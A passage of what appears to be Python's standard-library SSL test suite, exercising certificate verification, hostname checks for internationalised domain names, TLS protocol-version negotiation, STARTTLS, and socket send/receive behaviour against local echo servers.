client_context.options |= ssl.OP_NO_TLSv1_3
# only ECDSA certs
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC and RSA key/cert pairs
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
server_context.load_cert_chain(SIGNED_CERTFILE)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_check_hostname_idn(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(IDNSANSFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify, when specified in several
# different ways
idn_hostnames = [
('könig.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
(b'xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('königsgäßchen.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
('xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
(b'xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
# ('königsgäßchen.idna2008.pythontest.net',
# 'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
('xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
(b'xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
]
for server_hostname, expected_hostname in idn_hostnames:
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=server_hostname) as s:
self.assertEqual(s.server_hostname, expected_hostname)
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertEqual(s.server_hostname, expected_hostname)
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="python.example.org") as s:
with self.assertRaises(ssl.CertificateError):
s.connect((HOST, server.port))
def test_wrong_cert_tls12(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
# require TLS client authentication
server_context.verify_mode = ssl.CERT_REQUIRED
# TLS 1.3 has different handshake
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
@unittest.skipUnless(ssl.HAS_TLSv1_3, "Test needs TLS 1.3")
def test_wrong_cert_tls13(self):
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
server_context.verify_mode = ssl.CERT_REQUIRED
server_context.minimum_version = ssl.TLSVersion.TLSv1_3
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# TLS 1.3 perform client cert exchange after handshake
s.connect((HOST, server.port))
try:
s.write(b'data')
s.read(4)
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
def test_ssl_cert_verify_error(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
try:
s.connect((HOST, server.port))
except ssl.SSLError as e:
msg = 'unable to get local issuer certificate'
self.assertIsInstance(e, ssl.SSLCertVerificationError)
self.assertEqual(e.verify_code, 20)
self.assertEqual(e.verify_message, msg)
self.assertIn(msg, repr(e))
self.assertIn('certificate verify failed', repr(e))
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
def test_PROTOCOL_TLS(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1')
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS,
False, client_options=ssl.OP_NO_SSLv2)
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=SIGNED_CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=SIGNING_CA)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_CLIENT)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# sendall accepts bytes-like objects
if ctypes is not None:
ubyte = ctypes.c_ubyte * len(data)
byteslike = ubyte.from_buffer_copy(data)
s.sendall(byteslike)
self.assertEqual(s.read(), data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, bytearray(100))
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_CLIENT)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
context.load_cert_chain(SIGNED_CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
self.assertTrue(server.server_side)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.send(remote.recv(4))
t = threading.Thread(target=serve)
t.start()
# Client wait until server setup and perform a connect.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client.send(b'data')
client.recv()
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_no_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
# OpenSSL enables all TLS 1.3 ciphers, enforce TLS 1.2 for test
client_context.options |= ssl.OP_NO_TLSv1_3
# Force different suites on client and master
client_context.set_ciphers("AES128")
server_context.set_ciphers("AES256")
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", server.conn_errors[0])
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
self.assertIs(s._sslobj, None)
s.connect((HOST, server.port))
if IS_OPENSSL_1_1_1 and ssl.HAS_TLSv1_3:
self.assertEqual(s.version(), 'TLSv1.3')
elif ssl.OPENSSL_VERSION_INFO >= (1, 0, 2):
self.assertEqual(s.version(), 'TLSv1.2')
else: # 0.9.8 to 1.0.1
self.assertIn(s.version(), ('TLSv1', 'TLSv1.2'))
self.assertIs(s._sslobj, None)
self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_TLSv1_3,
"test requires TLSv1.3 enabled OpenSSL")
def test_tls1_3(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.load_cert_chain(CERTFILE)
context.options |= (
ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1 | ssl.OP_NO_TLSv1_2
)
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn(s.cipher()[0], {
'TLS_AES_256_GCM_SHA384',
'TLS_CHACHA20_POLY1305_SHA256',
'TLS_AES_128_GCM_SHA256',
})
self.assertEqual(s.version(), 'TLSv1.3')
@unittest.skipUnless(hasattr(ssl.SSLContext, 'minimum_version'),
"required OpenSSL 1.1.0g")
def test_min_max_version(self):
client_context, server_context, hostname = testing_context()
# client TLSv1.0 to 1.2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# server only TLSv1.2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.2')
# client 1.0 to 1.2, server 1.0 to 1.1
server_context.minimum_version = ssl.TLSVersion.TLSv1
server_context.maximum_version = ssl.TLSVersion.TLSv1_1
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.1')
# client 1.0, server 1.2 (mismatch)
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLError) as e:
s.connect((HOST, server.port))
self.assertIn("alert", str(e.exception))
@unittest.skipUnless(hasattr(ssl.SSLContext, 'minimum_version'),
"required OpenSSL 1.1.0g")
@unittest.skipUnless(ssl.HAS_SSLv3, "requires SSLv3 support")
def test_min_max_version_sslv3(self):
client_context, server_context, hostname = testing_context()
server_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.maximum_version = ssl.TLSVersion.SSLv3
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'SSLv3')
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.load_cert_chain(CERTFILE)
# TLSv1.3 defaults to PFS key agreement and no longer has KEA in
# cipher name.
context.options |= ssl.OP_NO_TLSv1_3
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context,
chatty=True,
connectionchatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
